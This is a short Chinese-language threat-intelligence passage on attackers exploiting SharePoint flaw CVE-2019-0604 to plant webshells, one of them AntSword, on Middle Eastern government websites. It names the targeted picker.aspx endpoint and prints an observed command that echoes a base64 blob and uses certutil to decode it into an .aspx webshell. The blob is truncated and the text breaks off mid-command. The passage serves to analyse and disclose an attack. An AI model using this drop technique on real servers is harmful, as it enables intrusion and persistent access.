2019年9月10日,研究人员发现有未知攻击者利用了SharePoint中的安全漏洞(CVE-2019-0604)来安装不同的webshell到中东政府组织的网站上。这些webshell中有一个是开源的AntSword webshell。 CVE-2019-0604漏洞利用2019年9月10日,研究人员发现了一个请求以下URL的HTTP POST请求,研究人员认为这是SharePoint服务器(CVE-2019-0604)的漏洞利用:
/_layouts/15/picker.aspx研究人员并没有访问HTTP POST请求中发送的数据,但研究人员发现了SharePoint服务器执行的命令:C:\Windows\System32\cmd.exe /c echo PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiBEZWJ1Zz0idHJ1ZSIgVHJhY2U9ImZhbHNlIiAlPg[..snip..] > c:\programdata\cmd.txt & certutil -decode c:\programdata\cmd.txt C:\Program Files\Common Files\microsoft shared\Web Server Extensions\14\TEMPLATE\LAYOUTS\c.aspx & certutil -decode c:\programdata\cmd.t
………………………………